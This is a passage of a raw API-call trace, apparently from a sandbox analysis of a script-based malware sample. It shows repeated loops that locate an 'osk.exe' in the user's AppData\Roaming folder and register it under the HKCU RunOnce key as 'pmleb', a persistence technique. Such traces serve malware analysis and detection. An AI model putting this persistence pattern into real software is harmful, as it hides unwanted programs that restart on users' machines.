FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.063] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0082.063] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.064] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0082.064] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.064] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.064] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.065] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.065] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.065] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.065] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.065] RegCloseKey (hKey=0x280) returned 0x0 [0082.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.066] SetTimer (hWnd=0x20280, nIDEvent=0x20d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d9 [0082.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.077] KillTimer (hWnd=0x20280, uIDEvent=0x20d9) returned 1 [0082.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.077] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.078] IUnknown:Release (This=0x787518) returned 0x1 [0082.078] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.078] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.078] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.078] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.079] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0082.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.079] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0082.079] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0082.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.080] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.080] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.080] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.080] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.080] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.081] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.081] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.081] RegCloseKey (hKey=0x280) returned 0x0 [0082.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.081] SetTimer (hWnd=0x20280, nIDEvent=0x20da, uElapse=0xa, lpTimerFunc=0x0) returned 0x20da [0082.081] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.093] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.093] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.093] KillTimer (hWnd=0x20280, uIDEvent=0x20da) returned 1 [0082.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.093] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.093] IUnknown:Release (This=0x787518) returned 0x1 [0082.093] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.093] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.093] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.094] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.094] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.094] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0082.094] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.094] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x60 [0082.094] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.095] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5f [0082.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.095] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.095] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.095] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.095] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.095] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.095] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.095] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.095] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.096] RegCloseKey (hKey=0x280) returned 0x0 [0082.096] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.096] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.096] SetTimer (hWnd=0x20280, nIDEvent=0x20db, uElapse=0xa, lpTimerFunc=0x0) returned 0x20db [0082.096] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.108] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.108] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.108] KillTimer (hWnd=0x20280, uIDEvent=0x20db) returned 1 [0082.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.109] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.109] IUnknown:Release (This=0x787518) returned 0x1 [0082.109] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.109] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.109] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.109] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.109] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: 